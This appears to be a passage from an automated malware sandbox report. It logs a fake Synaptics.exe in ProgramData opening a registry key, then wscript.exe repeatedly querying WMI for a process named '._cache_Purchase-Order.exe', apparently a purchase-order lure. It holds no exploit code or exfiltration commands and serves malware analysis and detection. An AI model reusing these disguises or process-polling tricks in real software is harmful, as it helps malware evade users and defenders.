                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Purchase-Order.exe'
